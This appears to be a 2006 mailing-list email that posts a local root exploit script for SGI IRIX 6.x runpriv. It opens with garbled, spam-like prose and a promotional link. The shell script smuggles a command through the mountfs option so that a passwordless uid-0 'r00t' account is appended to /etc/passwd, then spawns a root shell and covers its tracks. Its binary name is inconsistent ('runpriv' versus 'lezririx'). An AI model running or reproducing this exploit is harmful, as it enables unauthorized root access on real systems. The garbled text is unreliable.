SGI IRIX 6.*usr/sysadm/bin/runpriv local root exploit
From: "rod hedor" <rodhedor@hotmail.com.>
To: [email protected]
Subject: SGI IRIX 6.*usr/sysadm/bin/runpriv local root exploit
Date: Sat, 11 Mar 2006 20:59:00 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
X-OriginalArrivalTime: 11 Mar 2006 20:59:01.0747 (UTC) FILETIME=[9FCDD430:01C6454E]
X-Virus-Scanned: antivirus-gw at tyumen.ru
SGI IRIX 6.*usr/sysadm/bin/runpriv
draft resolution to be to complete at antecedence but to stoke seriously
came ran ready-to-wear
there is no need to explain in the interest of owners
yonder protection them from geeks
but whom need to make realize excellent. visit
http://lezr.com/vb
echo [ SGI IRIX 6.5 /usr/sysadm/bin/lezririx local root exploit
echo [ Creating cleanup and shell scripts
rm -rf /tmp/passwd123
rm -rf /tmp/rootcmd.sh
cp /etc/passwd /tmp/passwd123
echo "#!/bin/sh" >> /tmp/rootcmd.sh
echo "mv /tmp/passwd123 /etc/passwd" >> /tmp/rootcmd.sh
echo "chmod 644 /etc/passwd" >> /tmp/rootcmd.sh
echo "chown root:sys /etc/passwd" >> /tmp/rootcmd.sh
echo "rm -rf /tmp/rootcmd.sh" >> /tmp/rootcmd.sh
echo "/bin/sh" >> /tmp/rootcmd.sh
chmod +x /tmp/rootcmd.sh
/usr/sysadm/bin/lezririx mountfs -s test -d / -o \|"ksh -c 'echo
r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
echo [ game over
su r00t -c /tmp/rootcmd.sh
rm -rf /tmp/passwd123
rm -rf /tmp/rootcmd.sh
by: RoDhEDoR
[email protected]
L-G-H Team
http://www.lezr.com
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/